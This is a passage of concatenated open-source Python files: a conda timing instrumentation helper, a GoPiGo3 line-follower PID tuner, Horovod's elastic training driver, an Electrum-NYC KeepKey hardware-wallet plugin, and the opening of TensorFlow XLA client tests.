return f
as_completed = as_completed
def get_instrumentation_record_file():
default_record_file = join('~', '.conda', 'instrumentation-record.csv')
return expand(os.environ.get("CONDA_INSTRUMENTATION_RECORD_FILE", default_record_file))
class time_recorder(ContextDecorator): # pragma: no cover
record_file = get_instrumentation_record_file()
start_time = None
total_call_num = defaultdict(int)
total_run_time = defaultdict(float)
def __init__(self, entry_name=None, module_name=None):
self.entry_name = entry_name
self.module_name = module_name
def _set_entry_name(self, f):
if self.entry_name is None:
if hasattr(f, '__qualname__'):
entry_name = f.__qualname__
else:
entry_name = ':' + f.__name__
if self.module_name:
entry_name = '.'.join((self.module_name, entry_name))
self.entry_name = entry_name
def __call__(self, f):
self._set_entry_name(f)
return super(time_recorder, self).__call__(f)
def __enter__(self):
enabled = os.environ.get('CONDA_INSTRUMENTATION_ENABLED')
if enabled and boolify(enabled):
self.start_time = time()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self.start_time:
entry_name = self.entry_name
end_time = time()
run_time = end_time - self.start_time
self.total_call_num[entry_name] += 1
self.total_run_time[entry_name] += run_time
self._ensure_dir()
with open(self.record_file, 'a') as fh:
fh.write("%s,%f\n" % (entry_name, run_time))
# total_call_num = self.total_call_num[entry_name]
# total_run_time = self.total_run_time[entry_name]
# log.debug('%s %9.3f %9.3f %d', entry_name, run_time, total_run_time, total_call_num)
@classmethod
def log_totals(cls):
enabled = os.environ.get('CONDA_INSTRUMENTATION_ENABLED')
if not (enabled and boolify(enabled)):
return
log.info('=== time_recorder total time and calls ===')
for entry_name in sorted(cls.total_run_time.keys()):
log.info(
'TOTAL %9.3f % 9d %s',
cls.total_run_time[entry_name],
cls.total_call_num[entry_name],
entry_name,
)
@memoizemethod
def _ensure_dir(self):
if not isdir(dirname(self.record_file)):
os.makedirs(dirname(self.record_file))
def print_instrumentation_data(): # pragma: no cover
record_file = get_instrumentation_record_file()
grouped_data = defaultdict(list)
final_data = {}
if not isfile(record_file):
return
with open(record_file) as fh:
for line in fh:
entry_name, total_time = line.strip().split(',')
grouped_data[entry_name].append(float(total_time))
for entry_name in sorted(grouped_data):
all_times = grouped_data[entry_name]
counts = len(all_times)
total_time = sum(all_times)
average_time = total_time / counts
final_data[entry_name] = {
'counts': counts,
'total_time': total_time,
'average_time': average_time,
}
print(json.dumps(final_data, sort_keys=True, indent=2, separators=(',', ': ')))
if __name__ == "__main__":
print_instrumentation_data()
|
pid_tuner.py
|
from __future__ import print_function
from __future__ import division
from curtsies import Input
from easygopigo3 import EasyGoPiGo3
from di_sensors.easy_line_follower import EasyLineFollower
from threading import Thread, Event
import signal
from time import sleep, time
def drawLogo():
print(" _____ _____ _ _____ ____ ")
print(" / ____| | __ (_)/ ____| |___ \ ")
print(" | | __ ___ | |__) || | __ ___ __) |")
print(" | | |_ |/ _ \| ___/ | | |_ |/ _ \ |__ < ")
print(" | |__| | (_) | | | | |__| | (_) | ___) |")
print(" \_____|\___/|_| |_|\_____|\___/ |____/ ")
print(" ")
def drawDescription():
print("\nPress the following keys to run the features of the GoPiGo3/LineFollower.")
print("Press on the appropriate keys to tune the PID parameters for the line follower.\n")
def drawMenu():
"""
Prints all the key-bindings between the keys and the GoPiGo3/LineFollower's commands on the screen.
"""
keybindings = {
"<ESC>" : "Exit",
"x" : "Move the GoPiGo3 forward",
"<SPACE>" : "Stop the GoPiGo3 from moving",
"1" : "Increase loop frequency",
"2" : "Decrease loop frequency",
"3" : "Increase GoPiGo3 speed",
"4" : "Decrease GoPiGo3 speed",
"u" : "Increase the Kp gain",
"j" : "Increase the Ki gain",
"n" : "Increase the Kd gain",
"i" : "Decrease the Kp gain",
"k" : "Decrease the Ki gain",
"m" : "Decrease the Kd gain",
"r" : "Reset integral area for Ki gain to 0.0",
"w" : "Calibrate the line follower on a white surface",
"b" : "Calibrate the line follower on a black surface"
}
order_of_keys = ["<ESC>", "x", "<SPACE>", "1", "2", "3", "4", "u", "j", "n", "i", "k", "m", "r", "w", "b"]
try:
for key in order_of_keys:
print("\r[key {:8}] : {}".format(key, keybindings[key]))
except KeyError:
print("Error: Keys found in order_of_keys don't match with those in keybindings.")
print()
stopper = Event()
try:
gpg = EasyGoPiGo3()
except Exception as err:
print(str(err))
exit(1)
lf = EasyLineFollower()
stepSize = 0.1
loopFreq = 100.0
setPoint = 0.5
motorSpeed = 300
leftMotorSpeed = 0
rightMotorSpeed = 0
stopMotors = True
Kp = 0.0
Ki = 0.0
Kd = 0.0
integralArea = 0.0
def controller():
global stopper, gpg, lf, stepSize, loopFreq, setPoint, motorSpeed, leftMotorSpeed, rightMotorSpeed,stopMotors, Kp, Ki, Kd
global integralArea
loopPeriod = 1 / loopFreq
integralArea = 0.0
previousError = 0.0
try:
while not stopper.is_set():
start = time()
# <0.5 when line is on the left
# >0.5 when line is on the right
current, _ = lf.read('weighted-avg')
# calculate correction
error = current - setPoint
if Ki < 0.0001 and Ki > -0.0001:
integralArea = 0.0
else:
integralArea += error
correction = Kp * error + Ki * integralArea + Kd * (error - previousError)
# print(Kp * error, Ki * integralArea, Kd * (error - previousError))
previousError = error
# calculate motor speedss
leftMotorSpeed = int(motorSpeed + correction)
rightMotorSpeed = int(motorSpeed - correction)
if leftMotorSpeed == 0: leftMotorSpeed = 1
if rightMotorSpeed == 0: rightMotorSpeed = 1
# if leftMotorSpeed >= 300: leftMotorSpeed = 299
# if rightMotorSpeed >= 300: rightMotorSpeed = 299
# update motor speeds
if stopMotors is False:
gpg.set_motor_dps(gpg.MOTOR_LEFT, dps=leftMotorSpeed)
gpg.set_motor_dps(gpg.MOTOR_RIGHT, dps=rightMotorSpeed)
# make the loop work at a given frequency
end = time()
delayDiff = end - start
if loopPeriod - delayDiff > 0:
sleep(loopPeriod - delayDiff)
except Exception as err:
print(str(err))
stopper.set()
finally:
gpg.stop()
def Main():
drawLogo()
drawDescription()
drawMenu()
refresh_rate = 20.0
period = 1.0 / refresh_rate
controlThread = Thread(target = controller)
controlThread.start()
global stopper, gpg, lf, stepSize, loopFreq, motorSpeed, leftMotorSpeed, rightMotorSpeed, stopMotors, Kp, Ki, Kd
global integralArea
with Input(keynames = "curtsies", sigint_event = True) as input_generator:
while True:
# if nothing is captured in [period] seconds
# then send() function returns None
key = input_generator.send(period)
if key is None:
continue
if stopper.is_set():
# exit
gpg.stop()
break
if key == "<ESC>":
# exit
stopper.set()
break
if key == "x":
stopMotors = False
if key == "<SPACE>":
stopMotors = True
sleep(0.1)
gpg.stop()
if key == "1":
loopFreq += 1.0
if key == "2":
loopFreq -= 1.0
if key == "3":
motorSpeed += 1
if key == "4":
motorSpeed -= 1
if key == "u":
Kp += 5.0
if key == "j":
Ki += 0.001
if key == "n":
Kd += 100.0
if key == "i":
Kp -= 5.0
if key == "k":
Ki -= 0.001
if key == "m":
Kd -= 100.0
if key == "r":
integralArea = 0.0
if key == "w":
lf.set_calibration('white')
if key == "b":
lf.set_calibration('black')
print('Kp={:3f} Ki={:3f} Kd={:3f} L={:3d} R={:3d} ErrorArea={:3f} LoopFreq={:3d} Speed={:3d}'.format(Kp, Ki, Kd, leftMotorSpeed, rightMotorSpeed, integralArea, int(loopFreq), motorSpeed))
controlThread.join()
if __name__ == "__main__":
signal.signal(signal.SIGTSTP, lambda signum, frame: print("Press the appropriate key for closing the app."))
try:
Main()
except IOError as error:
print(str(error))
exit(1)
exit(0)
|
driver.py
|
# Copyright 2020 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import logging
import os
import queue
import threading
import time
from collections import defaultdict
from horovod.runner.common.util import hosts, timeout
from horovod.runner.elastic.discovery import HostManager
from horovod.runner.elastic.registration import WorkerStateRegistry
from horovod.runner.elastic.worker import WorkerNotificationClient
DISCOVER_HOSTS_FREQUENCY_SECS = 1.0
ELASTIC_TIMEOUT_SECS = 600
def _epoch_time_s():
return int(time.time())
class Results(object):
def __init__(self, error_message, worker_results):
self.error_message = error_message
self.worker_results = worker_results
class ResultsRecorder(object):
def __init__(self):
self._error_message = None
self._worker_results = {}
self._worker_threads = queue.Queue()
def expect(self, worker_thread):
self._worker_threads.put(worker_thread)
def set_error_message(self, error_message):
self._error_message = error_message
def add_result(self, key, value):
if key in self._worker_results:
return
self._worker_results[key] = value
def get_results(self):
while not self._worker_threads.empty():
worker_thread = self._worker_threads.get()
worker_thread.join()
return Results(self._error_message, self._worker_results)
class ElasticDriver(object):
def __init__(self, rendezvous, discovery, min_np, max_np, timeout=None, reset_limit=None, verbose=0):
self._rendezvous = rendezvous
self._host_manager = HostManager(discovery)
self._min_np = min_np
self._max_np = max_np
self._verbose = verbose
self._host_assignments = {}
self._rank_assignments = {}
self._world_size = 0
self._wait_hosts_cond = threading.Condition()
self._timeout = timeout or int(os.getenv('HOROVOD_ELASTIC_TIMEOUT', ELASTIC_TIMEOUT_SECS))
self._create_worker_fn = None
self._worker_clients = {}
self._worker_registry = WorkerStateRegistry(self, self._host_manager, reset_limit=reset_limit)
self._results = ResultsRecorder()
self._shutdown = threading.Event()
self._discovery_thread = threading.Thread(target=self._discover_hosts)
self._discovery_thread.daemon = True
self._discovery_thread.start()
def start(self, np, create_worker_fn):
self._create_worker_fn = create_worker_fn
self._activate_workers(np)
def resume(self):
self._activate_workers(self._min_np)
def stop(self, error_message=None):
self._results.set_error_message(error_message)
self._shutdown.set()
self._rendezvous.stop()
self._discovery_thread.join()
def finished(self):
return self._shutdown.is_set()
def get_results(self):
return self._results.get_results()
def register_worker_server(self, host, slot, addresses, secret_key):
self._worker_clients[(host, slot)] = WorkerNotificationClient(
addresses, secret_key, self._verbose)
def get_worker_client(self, slot_info):
return self._worker_clients.get((slot_info.hostname, slot_info.local_rank))
def record_ready(self, host, slot):
self._worker_registry.record_ready(host, slot)
def world_size(self):
return self._world_size
def local_size(self, host):
return len(self._host_assignments[host])
def get_slot_info(self, host, slot):
return self._host_assignments[host][slot] if self.has_rank_assignment(host, slot) \
else hosts.INVALID_SLOT_INFO
def get_coordinator_info(self):
return self._rank_assignments.get(0)
def has_rank_assignment(self, host, slot):
if self._host_manager.is_blacklisted(host):
return False
return host in self._host_assignments and len(self._host_assignments[host]) > slot
@property
def host_assignments(self):
return self._host_assignments
def wait_for_available_slots(self, min_np, min_hosts=1):
extra_message = ' An elastic job also requires that at least two hosts ' \
'are available to resolve compatible network interfaces. If you know which interfaces ' \
'are compatible in your network, set `--network-interface` to skip this check.' \
if min_hosts > 1 else ''
tmout = timeout.Timeout(
self._timeout,
message='Timed out waiting for {{activity}}. Please check that you have '
'enough resources to run at least {min_np} Horovod processes.{extra_message}'
.format(min_np=min_np, extra_message=extra_message))
self._wait_hosts_cond.acquire()
try:
while True:
current_hosts = self._host_manager.current_hosts
avail_slots = current_hosts.count_available_slots()
logging.debug(f"current available slots: {avail_slots}")
avail_hosts = len(current_hosts.available_hosts)
logging.debug(f"current available hosts: {avail_hosts}.")
if avail_slots >= min_np and avail_hosts >= min_hosts:
return current_hosts
if self._shutdown.is_set():
raise RuntimeError('Job has been shutdown, see above error messages for details.')
self._wait_hosts_cond.wait(tmout.remaining())
tmout.check_time_out_for('minimum number of slots to become available')
finally:
self._wait_hosts_cond.release()
def _activate_workers(self, min_np):
logging.info('wait for available slots: {}'.format(min_np))
current_hosts = self.wait_for_available_slots(min_np)
pending_slots = self._update_host_assignments(current_hosts)
self._worker_registry.reset(self.world_size())
self._start_worker_processes(pending_slots)
def _discover_hosts(self):
first_update = True
while not self._shutdown.is_set():
self._wait_hosts_cond.acquire()
try:
if self._host_manager.update_available_hosts():
self._notify_workers_host_changes(self._host_manager.current_hosts)
self._wait_hosts_cond.notify_all()
except RuntimeError as e:
if first_update:
# Misconfiguration, fail the job immediately
self._shutdown.set()
self._wait_hosts_cond.notify_all()
raise
# Transient error, retry until timeout
logging.warning(str(e))
finally:
self._wait_hosts_cond.release()
first_update = False
self._shutdown.wait(DISCOVER_HOSTS_FREQUENCY_SECS)
def _notify_workers_host_changes(self, current_hosts):
next_host_assignments = {}
if current_hosts.count_available_slots() >= self._min_np:
# Assignments are required to be stable via contract
next_host_assignments, _ = self._get_host_assignments(current_hosts)
if next_host_assignments == self.host_assignments:
# Skip notifying workers when host changes would not result in changes of host assignments
logging.debug('no host assignment changes, skipping notifications')
return
coordinator_slot_info = self.get_coordinator_info()
if not coordinator_slot_info:
logging.debug('no coordinator info, skipping notifications')
return
coordinator_client = self.get_worker_client(coordinator_slot_info)
if not coordinator_client:
logging.debug('no coordinator client, skipping notifications')
return
timestamp = _epoch_time_s()
try:
coordinator_client.notify_hosts_updated(timestamp)
except:
if self._verbose >= 2:
logging.exception('failed to notify {}[{}] of host updates'
.format(coordinator_slot_info.hostname,
coordinator_slot_info.local_rank))
def _update_host_assignments(self, current_hosts):
# Determine the slots that are already filled so we do not respawn these processes
active_slots = set([(host, slot_info.local_rank)
for host, slots in self._host_assignments.items()
for slot_info in slots])
# Adjust the host assignments to account for added / removed hosts
host_assignments, host_assignments_list = self._get_host_assignments(current_hosts)
if len(self._host_assignments) > 0:
# Ensure that at least one previously active host is still assigned, otherwise there is no
# way to sync the state to the new workers
prev_hosts = self._host_assignments.keys()
next_hosts = host_assignments.keys()
if not prev_hosts & next_hosts:
raise RuntimeError('No hosts from previous set remaining, unable to broadcast state.')
self._host_assignments = host_assignments
self._world_size = len(host_assignments_list)
self._rendezvous.init(host_assignments_list)
# Rank assignments map from world rank to slot info
rank_assignments = {}
for slot_info in host_assignments_list:
rank_assignments[slot_info.rank] = slot_info
self._rank_assignments = rank_assignments
# Get the newly assigned slots that need to be started
pending_slots = [slot_info
for host, slots in self._host_assignments.items()
for slot_info in slots
if (host, slot_info.local_rank) not in active_slots]
return pending_slots
def _get_host_assignments(self, current_hosts):
# Adjust the host assignments to account for added / removed hosts
host_list = [hosts.HostInfo(host, current_hosts.get_slots(host))
for host in current_hosts.host_assignment_order]
host_assignments_list = hosts.get_host_assignments(host_list, self._min_np, self._max_np)
host_assignments = defaultdict(list)
for slot_info in host_assignments_list:
host_assignments[slot_info.hostname].append(slot_info)
return host_assignments, host_assignments_list
def _start_worker_processes(self, pending_slots):
for slot_info in pending_slots:
logging.info('start worker process: {}[{}]'.format(slot_info.hostname, slot_info.local_rank))
self._start_worker_process(slot_info)
def _start_worker_process(self, slot_info):
create_worker_fn = self._create_worker_fn
shutdown_event = self._shutdown
host_event = self._host_manager.get_host_event(slot_info.hostname)
def run_worker():
res = create_worker_fn(slot_info, [shutdown_event, host_event])
exit_code, timestamp = res
self._handle_worker_exit(slot_info, exit_code, timestamp)
thread = threading.Thread(target=run_worker)
thread.daemon = True
thread.start()
self._results.expect(thread)
def _handle_worker_exit(self, slot_info, exit_code, timestamp):
if not self.has_rank_assignment(slot_info.hostname, slot_info.local_rank):
# Ignore hosts that are not assigned a rank
logging.debug('host {} has been blacklisted, ignoring exit from local_rank={}'
.format(slot_info.hostname, slot_info.local_rank))
return
if exit_code == 0:
rendezvous_id = self._worker_registry.record_success(slot_info.hostname, slot_info.local_rank)
else:
rendezvous_id = self._worker_registry.record_failure(slot_info.hostname, slot_info.local_rank)
if self.finished() and self._worker_registry.last_rendezvous() == rendezvous_id:
logging.debug('adding results for {}[{}]: ({}, {})'
.format(slot_info.hostname, slot_info.local_rank, exit_code, timestamp))
name = '{}[{}]'.format(slot_info.hostname, slot_info.local_rank)
self._results.add_result(name, (exit_code, timestamp))
|
plugin.py
|
import threading
from binascii import hexlify, unhexlify
from electrum_nyc.util import bfh, bh2u
from electrum_nyc.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT, NetworkConstants,
is_segwit_address)
from electrum_nyc.i18n import _
from electrum_nyc.plugins import BasePlugin
from electrum_nyc.transaction import deserialize
from electrum_nyc.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_nyc.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKeyCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def is_segwit(self):
return self.derivation.startswith("m/49'/")
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable bridge because it seems to never returns if keepkey is plugged
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if NetworkConstants.TESTNET else "Litecoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in ('standard',):
raise ScriptTypeNotSupported(_('This type of script is not supported with KeepKey.'))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.is_segwit())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.is_segwit())
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
segwit = wallet.keystore.is_segwit()
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, segwit=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, segwit=False):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
addrtype, hash_160 = b58_address_to_hash160(address)
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = script_type,
address_n = address_n,
)
else:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index),
script_type = script_type)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
if is_segwit_address(address):
txoutputtype.script_type = self.types.PAYTOWITNESS
else:
addrtype, hash_160 = b58_address_to_hash160(address)
if addrtype == NetworkConstants.ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == NetworkConstants.ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise BaseException('addrtype: ' + str(addrtype))
txoutputtype.address = address
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import threading
from absl.testing import absltest
import numpy as np
from tensorflow.compiler.xla.python import custom_call_for_test
from tensorflow.compiler.xla.python import xla_client
class ComputationTest(absltest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().Compile()
return xla_client.execute_with_python_values(compiled_c, arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-7,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol), c,
arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationPrinting(absltest.TestCase):
def ExampleComputation(self):
builder = xla_client.ComputationBuilder("acomputation")
p0 = builder.ParameterFromNumpy(np.float32(0))
p1 = builder.ParameterFromNumpy(np.zeros((4,), np.float32))
builder.Mul(p0, p1)
return builder.Build()
def testComputationToHloText(self):
computation = self.ExampleComputation()
hlo_text = computation.GetHloText()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
def testComputationToHloGraph(self):
computation = self.ExampleComputation()
hlo_dot_graph = computation.GetHloDotGraph()
self.assertTrue(hlo_dot_graph.startswith("digraph "))
class ComputationsWithConstantsTest(ComputationTest):
